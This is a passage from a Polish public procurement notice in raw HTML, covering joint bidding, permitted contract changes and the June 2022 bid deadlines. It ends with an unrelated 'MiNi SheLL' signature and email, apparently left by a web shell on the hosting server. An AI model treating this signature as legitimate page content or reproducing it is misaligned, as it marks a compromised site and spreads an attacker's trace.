zamówienia, art. 58 pzp W przypadku<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, art. 58 pzp W<br/>przypadku<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Oferta<br/>wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące<br/>wymagania:<br/>a) oferta powinna być sporządzona zgodnie z SWZ,<br/>b) sposób składania dokumentów w ofercie wspólnej: − dokumenty, dotyczące własnej firmy,<br/>takie jak np.: oświadczenie o braku podstaw do wykluczenia składa każdy z Wykonawców<br/>składających ofertę wspólną we własnym imieniu; − dokumenty wspólne takie jak np.: formularz<br/>ofertowy, formularz cenowy, dokumenty podmiotowe i przedmiotowe składa pełnomocnik<br/>Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną;<br/>c) kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą<br/>być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do<br/>reprezentowania tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza – jeżeli uzna za uzasadnione – możliwość zmiany ustaleń zawartej<br/>umowy w stosunku do treści oferty Wykonawcy, o których mowa w art. 455 ust. 1 pkt 1 ustawy<br/>Pzp, w następujących przypadkach:<br/>1) zmiany wynagrodzenia Wykonawcy, w przypadku zaistnienia jednej z następujących<br/>okoliczności poprzez zmianę świadczenia rzeczowego Wykonawcy i/lub zmianę<br/>wynagrodzenia, w przypadku wystąpienia w trakcie realizacji przedmiotu umowy zasadności<br/>wykonania robót zamiennych lub dodatkowych w stosunku do przewidzianych<br/>dokumentacją projektową i wykonawczą,<br/>2. Zgodnie z art. 454 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany<br/>zawartej umowy dotyczące:<br/>1) terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących<br/>okoliczności:<br/>a) wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie<br/>Zamawiającego,<br/>b) działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są<br/>konsekwencją winy którejkolwiek ze stron,<br/>c) w razie konieczności działań zmierzających do ograniczenia skutków zdarzenia<br/>losowego wywołanego przez czynniki zewnętrzne, którego nie można było<br/>przewidzieć,<br/>d) w razie zaistnienia zdarzeń niezależnych od Stron, po dacie zawarcia Umowy, o<br/>charakterze działania siły wyższej,<br/>e) koniecznością wykonania dodatkowych badań lub ekspertyz, o czas niezbędny do <br/>wykonania dodatkowych badań lub ekspertyz lub do uzyskania wymaganych decyzji <br/>bądź uzgodnień związanych z uzyskanymi wynikami badań lub ekspertyz,<br/>18<br/>f) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy <br/>skutkujące brakiem możliwości zawarcia umowy w pierwotnym terminie związania <br/>ofertą, prowadzenia robót lub prac lub wykonywania innych czynności przewidzianych <br/>umowa, które spowodowały niezawinione i niemożliwe do uniknięcia przez <br/>Wykonawcę opóźnienie, przy czym przedłużenie terminu realizacji zamówienia <br/>nastąpi o liczbę dni odpowiadającą okresowi opóźnienia wywołanego ww.<br/>okolicznościami.<br/>2) osoby pełniącej funkcje kierownika budowy i kierowników robót w przypadku<br/>zaistnienia jednej z następujących okoliczności:<br/>a) nie wykonywania lub nienależytego wykonywania swoich obowiązków wynikających<br/>z umowy,<br/>b) śmierci, choroby lub innych zdarzeń losowych,<br/>c) zmiana ta jest konieczna z jakichkolwiek innych przyczyn niezależnych od<br/>Wykonawcy<br/>3) podwykonawców w przypadku zaistnienia jednej z następujących okoliczności:<br/>a) zmiana podwykonawcy - musi być zaakceptowana przez Zamawiającego,<br/>b) zmiana zakresu powierzonych prac. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-22 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zgnzoliborz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-22 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com